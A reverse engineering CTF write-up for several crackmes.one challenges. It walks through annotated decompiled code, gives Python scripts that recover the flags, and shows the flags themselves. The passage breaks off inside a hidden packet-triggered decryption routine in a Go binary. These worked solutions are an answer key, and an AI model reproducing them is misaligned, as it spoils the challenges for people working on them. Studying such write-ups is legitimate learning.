Crackmes.one Reverse Engineering CTF 2026 WriteUp

29k 词

Easy

CryptPad

The main logic is in sub_4014EB:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
// Transforms the buffer lpMem in place: an XOR pass, an RC4 pass, then a second XOR pass.
// a3 selects the mode: 0 first loads the key and byte count from a trailer at the end of
// the buffer; 1 writes such a trailer after processing; any other value only shows an
// empty message box and returns its result.
CHAR __stdcall sub_4014EB(LPSTR lpMem, DWORD NumberOfBytesWritten, int a3)
{
if ( a3 )
{
if ( a3 != 1 )
return MessageBoxA(0, 0, 0, 0);
}
else
{
// a3 == 0: parse the trailer. The DWORD is read starting at the buffer's last byte.
count = *(_DWORD *)&lpMem[NumberOfBytesWritten - 1];
// The `count` key bytes sit immediately before that position.
src = &lpMem[NumberOfBytesWritten - 1 - count];
qmemcpy(dst_, src, count);
// The DWORD just before the key becomes the new byte count; it is then zeroed in the buffer.
NumberOfBytesWritten_1 = *((_DWORD *)src - 1);
*((_DWORD *)src - 1) = 0;
NumberOfBytesWritten = NumberOfBytesWritten_1;
}
// First XOR pass over lpMem using the bytes at dst_.
// NOTE(review): the loop count comes from the global ::NumberOfBytesWritten, not the
// parameter, and as decompiled the goto resets only v10 (not dst) — confirm against the
// disassembly whether the 8-byte key really repeats.
v7 = lpMem;
dst = dst_;
NumberOfBytesWritten_2 = ::NumberOfBytesWritten;
LABEL_6:
v10 = 0;
do
{
*v7++ ^= *dst++;
if ( ++v10 == 8 )
goto LABEL_6;
--NumberOfBytesWritten_2;
}
while ( NumberOfBytesWritten_2 );
// Initialise Sbox to the identity permutation: for n = 256..1 the index (u8)(-n) covers 0..255.
n256 = 256;
do
{
Sbox[(unsigned __int8)-(char)n256] = -(char)n256;
--n256;
}
while ( n256 );
// Expand the 8 key bytes in dst_ into a 256-byte repeating key table at unk_403695.
v12 = &unk_403695;
n256_1 = 256;
n8 = 0;
do
{
if ( n8 >= 8 )
n8 = 0;
*v12++ = dst_[n8++];
--n256_1;
}
while ( n256_1 );
// RC4 key scheduling: v15 = v15 + Sbox[v17] + key[v17] (mod 256), then swap Sbox[v17] and Sbox[v15].
v15 = 0;
v16 = v12 - 256; // rewind to the start of the expanded key table
v17 = 0;
n256_2 = 256;
do
{
LOBYTE(v15) = Sbox[v17] + v16[v17] + v15;
v19 = Sbox[v17];
Sbox[v17] = Sbox[v15];
Sbox[v15] = v19;
++v17;
--n256_2;
}
while ( n256_2 );
// RC4 keystream generation, XORed into lpMem for NumberOfBytesWritten bytes.
v20 = lpMem;
v21 = 0;
v22 = 0;
NumberOfBytesWritten_3 = NumberOfBytesWritten;
do
{
NumberOfBytesWritten_4 = NumberOfBytesWritten_3;
v24 = (unsigned __int8)(v21 + 1); // i = (position + 1) mod 256
v32 = v20;
v25 = Sbox[v24];
LOBYTE(v22) = v25 + v22; // j = j + S[i]
v26 = Sbox[v22];
Sbox[v24] = v26; // swap S[i] and S[j]
Sbox[v22] = v25;
LOBYTE(v24) = Sbox[(unsigned __int8)(v25 + v26)] ^ lpMem[v21]; // keystream byte S[S[i]+S[j]] XOR data
v20 = v32;
v32[v21++] = v24;
NumberOfBytesWritten_3 = NumberOfBytesWritten_4 - 1;
}
while ( NumberOfBytesWritten_4 != 1 );
// Second XOR pass, same shape as the first one; `result` ends up holding the last byte written.
v27 = lpMem;
dst_1 = dst_;
NumberOfBytesWritten_5 = ::NumberOfBytesWritten;
LABEL_20:
v30 = 0;
do
{
result = *dst_1 ^ *v27;
*v27++ = result;
++dst_1;
if ( ++v30 == 8 )
goto LABEL_20;
--NumberOfBytesWritten_5;
}
while ( NumberOfBytesWritten_5 );
if ( a3 == 1 )
{
// a3 == 1: emit the 13-byte trailer — 4-byte length, 8 key bytes, then the byte 8.
dst_2 = &lpMem[NumberOfBytesWritten - 13 + dword_403581];
*(_DWORD *)dst_2 = NumberOfBytesWritten;
dst_2 += 4;
qmemcpy(dst_2, dst_, 8u);
dst_2[8] = 8;
return dword_403581 + NumberOfBytesWritten;
}
return result;
}

This is an XOR → RC4 → XOR scheme. The XOR key is DE BC 0A 89 67 45 23 01. The RC4 key is 8 bytes long and is stored at the end of the file, in a trailer laid out as 4-byte message length + key + key length (8). The RC4 key is E8 17 1B F4 50 3F 3D 70.

CMO{r0ll_y0ur_0wn_b4d_c0d3}

FLRSCRNSVR.SCR

The main logic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
// Loads the screensaver text into Source and, when it is exactly 25 characters long,
// transforms a copy of it with sub_140001300 and compares the result against a second
// buffer; on a match it sets byte_140008898 to 1.
// NOTE(review): the GetDC/CreateCompatibleDC/..., GetSystemMetrics, FindFirstFileW and
// counting-loop sequences do not feed into the comparison below — they look like filler.
LSTATUS __fastcall sub_140001AE0(wchar_t *Source)
{
cbData = 512;
if ( !RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, &hKey) )
{
if ( !RegQueryValueExW(hKey, L"Wallpaper", 0, 0, Data, &cbData) )
Type[0] = 1;
RegCloseKey(hKey);
}
hdc = GetDC(0);
hdc_1 = CreateCompatibleDC(hdc);
ho = CreateCompatibleBitmap(hdc, 1, 1);
DeleteObject(ho);
DeleteDC(hdc_1);
ReleaseDC(0, hdc);
n5 = 5;
// Read the candidate text from HKCU\Software\FLRSCRNSVR; fall back to "Crackmes.one".
if ( RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\FLRSCRNSVR", 0, 0x20019u, &phkResult) )
{
wcscpy_s(Source, 0x100u, L"Crackmes.one");
}
else
{
QueryPerformanceCounter(&PerformanceCount);
Type[0] = sub_140001010() + 1;
GetSystemMetrics(0);
lpcbData = 512;
if ( GetWindowsDirectoryW(Buffer, 0x104u) )
{
wcscat_s(Buffer, 0x104u, L"*.dll");
hFindFile = FindFirstFileW(Buffer, &FindFileData);
if ( hFindFile != (HANDLE)-1LL )
FindClose(hFindFile);
}
// The "Text" value is read straight into Source; a failed query uses the default text.
if ( RegQueryValueExW(phkResult, L"Text", 0, Type, (LPBYTE)Source, &lpcbData) )
{
hWnd = GetDesktopWindow();
IsWindow(hWnd);
wcscpy_s(Source, 0x100u, L"Crackmes.one");
hdc_2 = GetDC(0);
hdc_3 = CreateCompatibleDC(hdc_2);
ho_1 = CreateCompatibleBitmap(hdc_2, 1, 1);
DeleteObject(ho_1);
DeleteDC(hdc_3);
ReleaseDC(0, hdc_2);
}
else
{
v23 = 0;
n5_1 = 5;
do
{
++v23;
--n5_1;
}
while ( n5_1 );
// An empty "Text" value also falls back to the default text.
if ( !wcsnlen(Source, 0x100u) )
wcscpy_s(Source, 0x100u, L"Crackmes.one");
}
GetSystemMetrics(0);
RegCloseKey(phkResult);
}
// n25 = length of Source in wide characters.
n25 = -1;
do
++n25;
while ( Source[n25] );
// Only a 25-character text is checked at all.
if ( n25 == 25 )
{
v24 = 0;
n5_2 = 5;
do
{
++v24;
--n5_2;
}
while ( n5_2 );
wcscpy_s(Destination, 0x100u, Source);
Type[0] = GetSystemMetrics(0);
sub_140001300((__int64)Destination); // transforms the copy in place
hWnd_1 = GetDesktopWindow();
IsWindow(hWnd_1);
sub_140001890(Destination_); // fills the buffer the transformed text is compared with
Type[0] = GetSystemMetrics(0);
v25 = 0;
do
{
++v25;
--n5;
}
while ( n5 );
// Compare Destination element by element with the data 520 elements further on,
// stopping at the first difference or at the terminator.
// NOTE(review): presumably offset 520 is where Destination_ lives — confirm the layout.
p_Destination = Destination;
do
{
v16 = p_Destination[520];
v17 = *p_Destination - v16;
if ( v17 )
break;
++p_Destination;
}
while ( v16 );
if ( v17 )
{
// Mismatch: no flag is set.
hdc_4 = GetDC(0);
hdc_5 = CreateCompatibleDC(hdc_4);
ho_2 = CreateCompatibleBitmap(hdc_4, 1, 1);
DeleteObject(ho_2);
DeleteDC(hdc_5);
return ReleaseDC(0, hdc_4);
}
else
{
// Match: record success in byte_140008898.
h = GetStockObject(4);
result = GetObjectW(h, 16, &PerformanceCount);
byte_140008898 = 1;
}
}
else
{
result = RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, (PHKEY)Type);
if ( !result )
return RegCloseKey(*(HKEY *)Type);
}
return result;
}

The sub_140001300 is the encrypt function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
// Transforms the NUL-terminated wide string at p_Destination in place, in three steps:
// (1) alphabet substitution, (2) XOR of each character with (key character + index),
// (3) reversal of the whole string.
// NOTE(review): the GetDC/..., GetStockObject/GetObjectW, registry, FindFirstFileW,
// SetLastError and counting-loop sequences do not touch the string — they look like filler.
__int16 __fastcall sub_140001300(__int64 p_Destination)
{
dwErrCode[0] = GetTickCount() % 0x64 + 5;
SetLastError(dwErrCode[0]);
// Destination = source alphabet, assembled from two pieces.
wcscpy_s(Destination, 0x50u, L"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOP");
hWnd = GetDesktopWindow();
IsWindow(hWnd);
wcscat_s(Destination, 0x50u, L"QRSTUVWXYZ0123456789}_{=-");
nSize = 32;
if ( GetComputerNameW(Buffer, &nSize) )
dwErrCode[0] = Buffer[0];
// Destination_ = target alphabet (the source alphabet written backwards), also in two pieces.
wcscpy_s(Destination_, 0x50u, L"-={_}9876543210ZYXWVUTSRQPONMLKJIHGF");
hdc = GetDC(0);
hdc_1 = CreateCompatibleDC(hdc);
ho = CreateCompatibleBitmap(hdc, 1, 1);
DeleteObject(ho);
DeleteDC(hdc_1);
ReleaseDC(0, hdc);
hdc_2 = GetDC(0);
hdc_3 = CreateCompatibleDC(hdc_2);
ho_1 = CreateCompatibleBitmap(hdc_2, 1, 1);
DeleteObject(ho_1);
DeleteDC(hdc_3);
ReleaseDC(0, hdc_2);
wcscat_s(Destination_, 0x50u, L"EDCBAzyxwvutsrqponmlkjihgfedcba");
h = GetStockObject(4);
GetObjectW(h, 16, pv);
v10 = -1;
// v11 = length of the input string in 16-bit characters.
v11 = -1;
do
++v11;
while ( *(_WORD *)(p_Destination + 2 * v11) );
v12 = 0;
n5 = 5;
dwErrCode[0] = 0;
n5_1 = 5;
do
{
++dwErrCode[0];
--n5_1;
}
while ( n5_1 );
// Step 1: replace every character found in Destination by the character at the same
// index in Destination_; characters outside the alphabet are left unchanged.
for ( i = 0; i < v11; ++i )
{
hWnd_1 = GetDesktopWindow();
IsWindow(hWnd_1);
v17 = wcschr(Destination, *(_WORD *)(p_Destination + 2 * i));
if ( v17 )
{
dwErrCode[0] = 0;
n5_2 = 5;
do
{
++dwErrCode[0];
--n5_2;
}
while ( n5_2 );
*(_WORD *)(p_Destination + 2 * i) = Destination_[v17 - Destination];
}
if ( !RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, &hKey) )
RegCloseKey(hKey);
}
h_1 = GetStockObject(4);
GetObjectW(h_1, 16, pv_);
// The XOR key is stored into v32 two 16-bit characters at a time; the write-up reads
// the resulting string as "FLARERALF".
v32[0] = 'L\0F';
dwErrCode[0] = 0;
do
{
++dwErrCode[0];
--n5;
}
while ( n5 );
v32[1] = 'R\0A';
v32[2] = 'R\0E';
h_2 = GetStockObject(4);
GetObjectW(h_2, 16, pv__1);
TickCount = GetTickCount();
SetLastError(TickCount % 0x64 + 5);
v32[3] = 'L\0A';
v32[4] = 'F';
dwErrCode[0] = GetSystemMetrics(0);
hdc_4 = GetDC(0);
hdc_5 = CreateCompatibleDC(hdc_4);
ho_2 = CreateCompatibleBitmap(hdc_4, 1, 1);
DeleteObject(ho_2);
DeleteDC(hdc_5);
ReleaseDC(0, hdc_4);
// v10 = length of the key in 16-bit characters (it started at -1 above).
do
++v10;
while ( *((_WORD *)v32 + v10) );
v25 = RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, &phkResult);
if ( !v25 )
LOWORD(v25) = RegCloseKey(phkResult);
// Step 2: XOR character j with (key[j % keylen] + j), truncated to 16 bits.
for ( j = 0; j < v11; ++j )
{
if ( GetWindowsDirectoryW(FileName, 0x104u) )
{
wcscat_s(FileName, 0x104u, L"*.dll");
hFindFile = FindFirstFileW(FileName, &FindFileData);
if ( hFindFile != (HANDLE)-1LL )
FindClose(hFindFile);
}
LOWORD(v25) = *((_WORD *)v32 + j % v10) + j;
*(_WORD *)(p_Destination + 2 * j) ^= v25;
}
// Step 3: reverse the string in place by swapping from both ends towards the middle.
if ( v11 >> 1 )
{
v28 = (_WORD *)(p_Destination - 2 + 2 * v11); // points at the last character
do
{
if ( !RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, &hKey) )
RegCloseKey(hKey);
v29 = *(_WORD *)(p_Destination + 2 * v12);
if ( GetWindowsDirectoryW(FileName, 0x104u) )
{
wcscat_s(FileName, 0x104u, L"*.dll");
hFindFile_1 = FindFirstFileW(FileName, &FindFileData);
if ( hFindFile_1 != (HANDLE)-1LL )
FindClose(hFindFile_1);
}
*(_WORD *)(p_Destination + 2 * v12) = *v28;
*v28 = v29;
v25 = RegOpenKeyExW(HKEY_CURRENT_USER, L"Control Panel\\Desktop", 0, 0x20019u, (PHKEY)dwErrCode);
if ( !v25 )
LOWORD(v25) = RegCloseKey(*(HKEY *)dwErrCode);
++v12;
--v28;
}
while ( v12 < v11 >> 1 );
}
return v25;
}

The cipher is substitution → XOR with (key + index) → reverse, and the ciphertext it is compared against is loaded in sub_140001890.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Recover the FLRSCRNSVR flag by undoing sub_140001300's three steps in reverse
# order: un-reverse the buffer, XOR with (key char + index), then invert the
# alphabet substitution.
cip = bytearray([0x3C, 0x51, 0x6A, 0x09, 0x02, 0x07, 0x25, 0x03, 0x30, 0x08, 0x04, 0x29, 0x68, 0x24, 0x01, 0x24, 0x18, 0x6B, 0x77, 0x0F, 0x70, 0x36, 0x02, 0x0E, 0x0B])

# The encryptor reverses the string last, so that is undone first.
U1 = cip[::-1]
key = "FLARERALF"
decrypted = []
# Iterate over the actual ciphertext length rather than a hard-coded 25.
for j in range(len(U1)):
    k = ord(key[j % len(key)]) + j
    c = U1[j] ^ k
    decrypted.append(c)

src_map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789}_{=-"
dst_map = "-={_}9876543210ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba"
# The binary maps src_map[i] -> dst_map[i]; build the inverse lookup.
rev_map = {}
for i in range(len(dst_map)):
    rev_map[dst_map[i]] = src_map[i]

flag_chars = []
for c in decrypted:
    ch = chr(c)
    # '?' marks a byte that decodes to something outside the alphabet.
    if ch in rev_map:
        flag_chars.append(rev_map[ch])
    else:
        flag_chars.append('?')

flag = ''.join(flag_chars)
print(flag)

CMO{frogt4s7ic_r3vers1ng}

RecordPlayer

WinMain:

1
2
3
4
5
6
7
// Program entry point: builds the dialog object in dwInitParam, runs it as a modal
// dialog with no parent window, then calls sub_140003570 on the same object.
// NOTE(review): sub_140003570 is presumably the matching destructor — its body is not shown.
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
sub_1400032B0(dwInitParam, hInstance, lpCmdLine, *(_QWORD *)&nShowCmd);
DialogBoxParamW_w((LPARAM)dwInitParam, 0);
sub_140003570(dwInitParam);
return 0;
}

sub_1400032B0 initialized the interface:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
// Constructor of the MainDialog object: runs the base initialiser with id 101, installs
// the MainDialog vtable, and creates the helper objects, brush and font stored in the
// object's slots. Returns p_dwInitParam.
_QWORD *__fastcall sub_1400032B0(_QWORD *p_dwInitParam, HINSTANCE hInstance, __int64 lpCmdLine, __int64 nShowCmd)
{
p_dwInitParam_1 = p_dwInitParam;
sub_140002C20(p_dwInitParam, hInstance, 101, nShowCmd);
*p_dwInitParam = &MainDialog::`vftable';
// Slots 11..14 (byte offset 88 onwards) are zeroed, with slot 14 set to 15.
// NOTE(review): this looks like an empty std::string (size 0, capacity 15) — confirm.
v6 = p_dwInitParam + 11;
*(_OWORD *)(p_dwInitParam + 11) = 0;
p_dwInitParam[13] = 0;
p_dwInitParam[14] = 15;
*((_BYTE *)p_dwInitParam + 88) = 0;
// Slot 10 (byte offset 80): a 0x1B8-byte object built by sub_1400016F0, or 0 if allocation failed.
v7 = operator new(0x1B8u);
if ( v7 )
v8 = sub_1400016F0(v7);
else
v8 = 0;
p_dwInitParam[10] = v8;
// Wrap a lambda that captures this object (signature void(std::string const &), per the
// vtable name) and hand it to the slot-10 object at offset 208.
v19[0] = &std::_Func_impl_no_alloc<_lambda_254f7f3896517544d5a333cbd1c27e47_,void,std::string const &>::`vftable';
v19[1] = p_dwInitParam;
v20 = v19;
v23 = 0;
v23 = (_BYTE *)sub_140003A30(v19, v22);
sub_140003AD0((__int64)v22, v8 + 208);
// Release the two temporary callable wrappers through their vtable slot at +32.
if ( v23 )
{
LOBYTE(v9) = v23 != v22;
(*(void (__fastcall **)(_BYTE *, __int64))(*(_QWORD *)v23 + 32LL))(v23, v9);
}
if ( v20 )
{
LOBYTE(v9) = v20 != v19;
(*(void (__fastcall **)(_QWORD *, __int64))(*v20 + 32LL))(v20, v9);
}
// Slot 4: a 0x48-byte object built from ids 111 and 110.
v10 = operator new(0x48u);
if ( v10 )
v11 = sub_1400010C0(v10, 111, 110);
else
v11 = 0;
p_dwInitParam[4] = v11;
// Slots 7, 8, 9: three 0x38-byte objects built by the same helper from a control id
// (1001, 1003, 1002) and a pair of resource ids each.
v12 = operator new(0x38u);
if ( v12 )
v13 = sub_140002EE0((int)v12, 1001, 106, 107, hInstance);
else
v13 = 0;
p_dwInitParam[7] = v13;
v14 = operator new(0x38u);
if ( v14 )
v15 = sub_140002EE0((int)v14, 1003, 104, 105, hInstance);
else
v15 = 0;
p_dwInitParam[8] = v15;
v16 = operator new(0x38u);
if ( v16 )
v17 = sub_140002EE0((int)v16, 1002, 102, 103, hInstance);
else
v17 = 0;
p_dwInitParam[9] = v17;
// Slot 5: solid brush; slot 6: 18-unit, weight-700 "Consolas" font.
p_dwInitParam[5] = CreateSolidBrush(0x33312Fu);
p_dwInitParam[6] = CreateFontW(18, 0, 1, 0, 700, 0, 0, 0, 0, 0, 0, 2u, 0, L"Consolas");
// Reset the data at offset 88 to empty: follow the stored pointer if slot 14 exceeds 15,
// then write a zero length and a zero first byte.
if ( p_dwInitParam[14] > 0xFu )
v6 = (_QWORD *)*v6;
p_dwInitParam[13] = 0;
*(_BYTE *)v6 = 0;
return p_dwInitParam;
}

According to Resource Hacker, resources 106 & 107 are the play button, 104 & 105 are the exit button, and 102 & 103 are the about button. In addition, resource ID 130 is the success page, and dialog ID 134 is the success dialog.

Dialog function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// Dialog procedure shared by the dialog objects. On message 272 (0x110, WM_INITDIALOG)
// it binds the object passed in dwNewLong to the window; for every other message it
// forwards to the bound object's virtual handler.
INT_PTR __fastcall DialogFunc(HWND hWnd, unsigned int n272, __int64 a3, _QWORD *dwNewLong)
{
if ( n272 == 272 )
{
dwNewLong[2] = hWnd; // remember the window handle at object offset 16
SetWindowLongPtrW(hWnd, -21, (LONG_PTR)dwNewLong); // index -21 is GWLP_USERDATA
return (*(int (__fastcall **)(_QWORD *))(*dwNewLong + 8LL))(dwNewLong); // virtual call at vtable offset 8
}
else
{
result = GetWindowLongPtrW(hWnd, -21);
// No object bound yet: return 0. Otherwise dispatch through vtable offset 32.
if ( result )
return (*(__int64 (__fastcall **)(INT_PTR, _QWORD, __int64, _QWORD *))(*(_QWORD *)result + 32LL))(result,n272,a3,dwNewLong);
}
return result;
}

When GetWindowLongPtrW returns a non-null object, the message is dispatched to this function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
// Message handler of the main dialog object a1. Handles two control-colouring messages
// and the custom message 32769 (0x8001); everything else goes to sub_7FF68AAC2D70.
HGDIOBJ __fastcall sub_7FF68AAC3770(__int64 a1, unsigned int n32769, HDC hdc, __int64 a4)
{
if ( n32769 == 307 ) // 0x133, WM_CTLCOLOREDIT
{
SetBkColor(hdc, 0x3F5D8Au);
SetTextColor(hdc, 0xFFFFFFu);
return *(HGDIOBJ *)(a1 + 40); // object slot 5
}
else if ( n32769 == 312 ) // 0x138, WM_CTLCOLORSTATIC
{
SetBkMode(hdc, 1); // 1 = TRANSPARENT
return GetStockObject(5); // 5 = NULL_BRUSH
}
else
{
if ( n32769 == 32769 )
{
// Custom message 0x8001: pass the data at a1 + 88 (via sub_7FF68AAC31F0) to a new
// dialog object built with dialog id 134, and run it modally with this dialog's
// window (a1 + 16) as the parent.
nShowCmd = sub_7FF68AAC31F0((__int64)v10, a1 + 88);
sub_7FF68AAC3D40((__int64)dwInitParam, *(HINSTANCE *)(a1 + 8), 134, nShowCmd);
DialogBoxParamW_w((LPARAM)dwInitParam, *(HWND *)(a1 + 16));
sub_7FF68AAC3EF0((__int64)dwInitParam);
}
// Falls through to the default handler, including after the 0x8001 case.
return (HGDIOBJ)sub_7FF68AAC2D70(a1, n32769, hdc, a4);
}
}

Note that the if ( n32769 == 32769 ) branch is the one that opens the success dialog (dialog 134): when the message is 0x8001, the program copies the string at a1+88 and shows it. Searching for PostMessageW leads to this function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// Callback: if the field at offset 104 of the object at a1 + 8 is still zero, copies the
// data described by a2 into that object's offset 88 and posts message 0x8001 to its window.
// NOTE(review): a2 is accessed like a std::string (pointer-or-inline data at [0], length
// at [2], capacity at [3]) and offset 104 like the destination's length — confirm.
void __fastcall sub_7FF68AAC3A60(__int64 a1, size_t *a2)
{
v2 = *(_QWORD *)(a1 + 8);
v3 = (void **)(v2 + 88);
if ( !*(_QWORD *)(v2 + 104) )
{
if ( v3 != (void **)a2 ) // skip the copy when source and destination are the same object
{
v4 = a2;
if ( a2[3] > 0xF ) // above 15 the first field holds a pointer to the data
v4 = (void *)*a2;
sub_7FF68AAC3C20(v3, v4, a2[2]);
}
PostMessageW(*(HWND *)(v2 + 16), 0x8001u, 0, 0);
}
}

A hardware breakpoint on a1+88 is triggered in:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
// Dispatches on the id a2 for the main dialog object a1. Returns 1 when the id was
// handled (1001, 1002, 1003) and 0 otherwise.
__int64 __fastcall sub_7FF68AAC3860(__int64 a1, __int16 a2)
{
switch ( a2 )
{
case 1001:
// Clear the data at a1 + 88 (assigned with length 0).
sub_7FF68AAC3C20((void **)(a1 + 88), &unk_7FF68AAC665A, 0);
v4 = *(_QWORD *)(a1 + 80);
if ( *(_BYTE *)(v4 + 28) )
{
sub_7FF68AAC27A0(v4);
}
else
{
// Flag byte at offset 28 is clear: load resource 141, set two options, then start.
sub_7FF68AAC1F50(v4, 141);
sub_7FF68AAC3A00(*(_QWORD *)(a1 + 80), 1u); // with argument 1 this stores -1 at offset 24
LOBYTE(v5) = 1;
sub_7FF68AAC3A20(*(_QWORD *)(a1 + 80), v5);
sub_7FF68AAC20F0(*(_QWORD *)(a1 + 80));
}
break;
case 1002:
// Open dialog 132 modally, passing it an empty value (zero length, capacity 15).
nShowCmd_ = 0;
v7 = 0;
n15 = 15;
LOBYTE(nShowCmd_) = 0;
sub_7FF68AAC3D40((__int64)dwInitParam, *(HINSTANCE *)(a1 + 8), 132, (__int64)&nShowCmd_);
DialogBoxParamW_w((LPARAM)dwInitParam, *(HWND *)(a1 + 16));
sub_7FF68AAC3EF0((__int64)dwInitParam);
break;
case 1003:
// Close the dialog.
EndDialog(*(HWND *)(a1 + 16), 0);
break;
default:
return 0;
}
return 1;
}

ID 141 is just the sound resource's ID; this function implements the play button. The following function is suspicious:

1
2
3
4
5
6
// Stores a signed step at a1 + 24 and returns it: a2 == 0 gives +1, a2 == 1 gives -1.
__int64 __fastcall sub_7FF68AAC3A00(__int64 a1, unsigned __int8 a2)
{
result = 2 * (a2 ^ 1u) - 1; // (a2 ^ 1) flips the low bit; 2*x - 1 maps 0/1 to -1/+1
*(_DWORD *)(a1 + 24) = result;
return result;
}

Since a2 = 1, this returns -1. So this is the first thing that is broken: the play direction. The second broken piece is in the call to sub_7FF68AAC3A20. Change the 1 to 0, press play, and the flag will be shown.

CMO{y0u_g0t_r1ckr0ll3d}

Intermediate

httpd

Notice that main.main contains nothing useful, while a text search finds the source file path /home/crudd/httpd3/httpd.go. Try to find all functions that belong to this file:

1
2
3
4
5
6
7
8
9
10
11
import idautils
import ida_funcs

# Dump the start address of every function IDA knows about, one "0x..." value
# per line, so an external tool can map each address back to a source file.
output_file = "E:/CTF/temp/out.txt"

# Count while writing instead of enumerating the function list a second time.
exported = 0
with open(output_file, "w") as f:
    for func_ea in idautils.Functions():
        f.write("0x{:X}\n".format(func_ea))
        exported += 1

print(f"[+] Exported {exported} functions to {output_file}")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import subprocess
import os
from tqdm import tqdm

def main():
    """Print every address from out.txt that addr2line attributes to httpd.go.

    Each non-empty line of the input file is treated as one hexadecimal
    address and looked up in the ``httpd`` binary with ``addr2line``.
    """
    input_file = "out.txt"
    binary = "httpd"
    target_path = "/home/crudd/httpd3/httpd.go"
    with open(input_file, 'r') as f:
        lines = [line.strip() for line in f if line.strip()]
    matched_addresses = []
    for addr in tqdm(lines, desc="Addrs", unit="addr"):
        clean_addr = addr.lower().replace('0x', '')
        try:
            result = subprocess.run(['addr2line', '-e', binary, clean_addr], capture_output=True, text=True, timeout=10)
        except subprocess.TimeoutExpired:
            # One stuck lookup must not abort a scan over thousands of addresses.
            continue
        output = result.stdout + result.stderr
        if target_path in output:
            matched_addresses.append(addr)
    for addr in matched_addresses:
        print(addr)


if __name__ == "__main__":
    main()

The output contains 3 functions: main.main, main.handler, and an extremely suspicious function, net/http.init. This function is disguised as a library function, but it has very complex logic and is in fact the core of the challenge:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
// Opens a live capture on device "re0" with the BPF filter "icmp" and loops over the
// captured packets. From each packet it assembles a 16-byte value out of fixed packet
// offsets; when the packet passes the checks below, that value is used as both AES key
// and CBC IV to decrypt a hard-coded 32-byte blob, which is then printed to stdout.
// NOTE(review): the offsets are consistent with a 14-byte Ethernet header plus a 20-byte
// IPv4 header in front of the ICMP message — confirm against a real capture.
void __golang net_http_init_0()
{
device_1.str = (uint8 *)"re0";
device_1.len = 3;
v14 = github_com_google_gopacket_pcap_OpenLive(device_1, 1600, 1, -10000000);
tab = v14._b4.tab;
data = v14._b4.data;
// A non-nil error from OpenLive panics.
if ( v14._b4.tab )
{
LABEL_37:
e._type = tab->_type;
e.data = data;
runtime_gopanic(e);
}
handle = v14.handle;
expr.str = (uint8 *)"icmp";
expr.len = 4;
v13 = github_com_google_gopacket_pcap__ptr_Handle_SetBPFFilter(v14.handle, expr);
// A non-nil error from SetBPFFilter panics as well.
if ( v13.tab )
{
e_1._type = v13.tab->_type;
e_1.data = v13.data;
runtime_gopanic(e_1);
goto LABEL_37;
}
// Build a gopacket PacketSource from the handle and its link type.
v15 = github_com_google_gopacket_pcap__ptr_Handle_pcapDatalink(handle);
p_gopacket_PacketSource = (gopacket_PacketSource *)runtime_newobject((runtime__type_1 *)&RTYPE_gopacket_PacketSource);
p_gopacket_PacketSource->source.tab = go_itab__ptr_github_com_google_gopacket_pcap_Handle_comma_github_com_google_gopacket_PacketDataSource;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
runtime_gcWriteBarrierCX();
else
